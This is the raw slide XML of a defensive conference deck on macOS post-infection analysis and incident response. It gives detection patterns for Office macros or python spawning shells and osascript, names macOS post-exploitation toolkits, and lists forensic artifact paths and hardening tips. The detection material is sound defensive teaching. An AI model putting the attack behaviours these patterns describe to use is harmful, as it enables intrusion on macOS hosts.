            <a:pPr marL="914400" lvl="2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18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D2110-032A-4744-9D29-031BD9FA677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975" y="2611620"/>
            <a:ext cx="4015993" cy="353374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954346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Other places to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1144" y="1510854"/>
            <a:ext cx="7201752" cy="44693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tmp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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>- look for suspicious scripts/binaries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var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/folders/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>- look for suspicious scripts/binaries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/Users/Shared/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>- look for suspicious scripts/binaries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/Library/Containers/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>- look for suspicious scripts/binaries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etc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/hosts/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>- check to see if sites like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>virustotal.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> are blocked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etc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sudoers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sz="2300" dirty="0"/>
              <a:t> - check entries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~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" i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bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="230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300" dirty="0"/>
              <a:t>– interesting commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2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24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2082A-2100-A34A-9D29-F5AC667E95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5144" y="2105818"/>
            <a:ext cx="5297483" cy="3279394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978389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Malware making </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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api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calls?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1144" y="1510854"/>
            <a:ext cx="6772713" cy="44693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dirty="0"/>
              <a:t>Malware leveraging command line = easy detection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dirty="0"/>
              <a:t>What about malware using API calls?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300" dirty="0"/>
              <a:t>Harder but not impossible!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 err="1"/>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> analysis: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900" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>dtruss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> ./&lt;binary&gt;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Strings Analysis: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900" dirty="0"/>
              <a:t>Strings &lt;binary&gt; &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>strings.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/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900" dirty="0"/>
              <a:t>Build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>yara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> rules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Behavioral Analysis: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1900" dirty="0"/>
              <a:t>Unique network activity? Files dropped?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2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24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165A5-A582-934A-9004-11C3C3D4F36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1569" y="1510854"/>
            <a:ext cx="5123183" cy="483914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481894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49" y="2765907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00993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61619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State of the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382618"/>
            <a:ext cx="10927770" cy="3450613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200" dirty="0"/>
              <a:t>Common in Bay Area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200" dirty="0"/>
              <a:t>EDR improvements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200" dirty="0"/>
              <a:t>More malware targeting macOS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200" dirty="0"/>
              <a:t>Need for macOS incident response/analysis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808466-C069-D34D-B709-5BE45CBD5E9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6074" y="4203205"/>
            <a:ext cx="9200165" cy="25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45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2584" y="1510854"/>
            <a:ext cx="6719596" cy="44693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macOS malware is becoming more prevalent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Defenders have several data sources to leverage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Simple detections (command line, least common user agents, etc.) can still be useful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Ensure Remote Apple Events, file sharing, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> are turned off if not needed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If an admin account is needed for remote management, randomize the password and add 2FA to the management server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2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24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3A74E-2EB7-C04E-91CA-E7F20065076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7012" y="2137664"/>
            <a:ext cx="5525248" cy="3074416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037480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0872" y="1510854"/>
            <a:ext cx="10420440" cy="4469322"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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“Mac Malware of 2019” Objective See Report: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://objective-see.com/downloads/MacMalware_2019.pdf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My Blog Post On This Content: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://medium.com/red-teaming-with-a-blue-team-mentaility/b0ede7ecfeb9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Thomas Reed’s PICT (in python): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/thomasareed/pict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My PICT (in Swift): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/PICT-Swift/tree/master/pict-Swift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Active Directory Discovery with a Mac: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/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100" dirty="0"/>
              <a:t>Tool to parse browser history:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/macOS-browserhist-parser/tree/master/parse-browser-history</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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22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7267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49" y="2765907"/>
            <a:ext cx="10415587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8618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61619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State of the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200" dirty="0"/>
              <a:t>Still lots of discomfort with macOS incident response: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What types of malware are used?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What types of persistence?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False vs. True positive?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Where are the system artifacts?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3000" dirty="0"/>
              <a:t>macOS malware analysis?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61A8B-2FB3-6C4F-BB6A-4FD6F83702F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8733" y="3550837"/>
            <a:ext cx="4899429" cy="316547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7803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21" y="2528163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Helpful detections/searches: </a:t>
            </a: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4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. parent-child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91275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parent-child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3000" dirty="0"/>
              <a:t>A single python parent process spawning several /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> or /bin/bash children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Several macOS post exploitation toolkits leveraging python (python Empyre, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>MacShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>EvilOSX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, etc.)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Under the hood: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endParaRPr lang="en-US" sz="3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888719-57DC-2248-A3A2-C64E5A5D0508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132788" y="5131538"/>
            <a:ext cx="9536531" cy="651936"/>
            <a:chOff x="895392" y="4546596"/>
            <a:chExt cx="9536531" cy="6519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95E391-193F-F745-98A2-EAAE5EA50D52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Python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4DB7A5-A3F4-EF43-AE42-F72F5CAE2CF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4715390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B7EAFB-F332-8641-ABBA-D85723FA5454}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8535389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ps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1C38824-0D43-B345-9979-2E7372DDFDE9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436459-21D5-2547-872D-F925E7CC4460}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6611924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757667-7C57-EE48-BD39-A2C4A34C7790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132788" y="5864801"/>
            <a:ext cx="9536531" cy="651936"/>
            <a:chOff x="895392" y="4546596"/>
            <a:chExt cx="9536531" cy="6519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B0935A-E820-0E49-B012-4074C8FB10BA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Python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457593-0626-594B-8CDE-650E5291EC21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4715390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sh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C0D384-9C3C-694D-B51E-6201B0C8563D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8535389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usr</a:t>
              </a:r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sbin</a:t>
              </a:r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lsof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5E0D4C6-2D9E-6747-AE58-8C0FE39BE71E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3EBB2E-3915-1B4E-96B8-BD647E3663A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6611924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253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parent-child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2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Any MS Office product spawning /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> or /bin/bash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/>
              <a:t>Detect malicious MS Office macros that spawn shell environments, which usually then call a scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>lang</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="26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Under the hood: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1CBDDD-3F52-824E-8C13-2375A257B1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132788" y="5327013"/>
            <a:ext cx="9536531" cy="651936"/>
            <a:chOff x="895392" y="4546596"/>
            <a:chExt cx="9536531" cy="65193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5CE9D1-9105-8D4D-A828-EA9F5D536606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Office Product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856819-F1A4-0946-84C1-B1FDD9C37D7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4715390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sh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> (or /bin/bash)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C5D1AC-45D5-774E-B384-ECE24E61322C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8535389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python –c &lt;code&gt;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B927E19-50CC-3F4E-9B9B-845FBEF8F40E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327B9B-4574-7246-835F-FB0A9A70CFE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6611924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0299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DD8B-B9D0-F64C-A266-FD538C49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461619"/>
            <a:ext cx="10415587" cy="104923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parent-child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116A-4B13-F648-A13D-1BA7EA50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8" y="1693627"/>
            <a:ext cx="10927770" cy="3450613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350"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eriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Any MS Office product spawning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/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Why? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3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600" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> is powerful and can be used for various tasks; detect malicious MS Office macros leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>macphish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> is an example)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800" dirty="0"/>
              <a:t>Under the hood:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3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1CBDDD-3F52-824E-8C13-2375A257B1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132788" y="5327013"/>
            <a:ext cx="9536531" cy="651936"/>
            <a:chOff x="895392" y="4546596"/>
            <a:chExt cx="9536531" cy="65193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5CE9D1-9105-8D4D-A828-EA9F5D536606}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="895392" y="4546596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Office Product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856819-F1A4-0946-84C1-B1FDD9C37D7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4715390" y="4546596"/>
              <a:ext cx="2508718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/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>usr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/bin/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>osascript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C5D1AC-45D5-774E-B384-ECE24E61322C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8535389" y="4571999"/>
              <a:ext cx="1896534" cy="6265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task performed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B927E19-50CC-3F4E-9B9B-845FBEF8F40E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2791926" y="4859862"/>
              <a:ext cx="1923464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5327B9B-4574-7246-835F-FB0A9A70CFE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7224108" y="4859862"/>
              <a:ext cx="1311280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9359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{085641EC-C233-0544-BCCF-E27F2E21CC7F}tf10001119</Template>
  <TotalTime>4677</TotalTime>
  <Words>1802</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>252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Rockwell</vt:lpstr>
      <vt:lpstr>Gallery</vt:lpstr>
      <vt:lpstr>macOS Post Infection Analysis</vt:lpstr>
      <vt:lpstr>bio</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>State of the union</vt:lpstr>
      <vt:lpstr>State of the union</vt:lpstr>
      <vt:lpstr>Helpful detections/searches:   1. parent-child relationships</vt:lpstr>
      <vt:lpstr>parent-child relationships</vt:lpstr>
      <vt:lpstr>parent-child relationships</vt:lpstr>
      <vt:lpstr>parent-child relationships</vt:lpstr>
      <vt:lpstr>parent-child relationships</vt:lpstr>
      <vt:lpstr>Example </vt:lpstr>
      <vt:lpstr>parent-child relationships</vt:lpstr>
      <vt:lpstr>Helpful detections/searches:   2. active directory enumeration searches</vt:lpstr>
      <vt:lpstr>Active directory enum</vt:lpstr>
      <vt:lpstr>Active directory enum</vt:lpstr>
      <vt:lpstr>Active directory enum</vt:lpstr>
      <vt:lpstr>Active directory enum</vt:lpstr>
      <vt:lpstr>Local account enum</vt:lpstr>
      <vt:lpstr>Helpful detections/searches:   3. Command line searches/detections   (not the best but can still be of use)</vt:lpstr>
      <vt:lpstr>Command line detections</vt:lpstr>
      <vt:lpstr>Command line detections</vt:lpstr>
      <vt:lpstr>Command line detections</vt:lpstr>
      <vt:lpstr>Command line detections</vt:lpstr>
      <vt:lpstr>Command line detections</vt:lpstr>
      <vt:lpstr>Command line detections</vt:lpstr>
      <vt:lpstr>Command line detections</vt:lpstr>
      <vt:lpstr>Helpful detections/searches:   4. OTHER USEFUL searches/detections</vt:lpstr>
      <vt:lpstr>OTHER USEFUL SEARCHES</vt:lpstr>
      <vt:lpstr>OTHER USEFUL SEARCHES</vt:lpstr>
      <vt:lpstr>Useful artifacts for  post infection analysis   </vt:lpstr>
      <vt:lpstr>Useful artifacts</vt:lpstr>
      <vt:lpstr>Browser history</vt:lpstr>
      <vt:lpstr>Browser history</vt:lpstr>
      <vt:lpstr>persistence</vt:lpstr>
      <vt:lpstr>Browser extensions</vt:lpstr>
      <vt:lpstr>System info</vt:lpstr>
      <vt:lpstr>Other places to check</vt:lpstr>
      <vt:lpstr>Malware making api calls?</vt:lpstr>
      <vt:lpstr>Putting it all together</vt:lpstr>
      <vt:lpstr>summary</vt:lpstr>
      <vt:lpstr>resources</vt:lpstr>
      <vt:lpstr>QUESTIONS?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Infection Analysis on macOS Hosts</dc:title>
  <dc:creator>Cedric Owens</dc:creator>
  <cp:lastModifiedBy>Cedric Owens</cp:lastModifiedBy>
  <cp:revision>67</cp:revision>
  <cp:lastPrinted>2020-01-05T04:10:11Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-03T15:04:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-14T19:26:37Z</dcterms:modified>
</cp:coreProperties>
</file>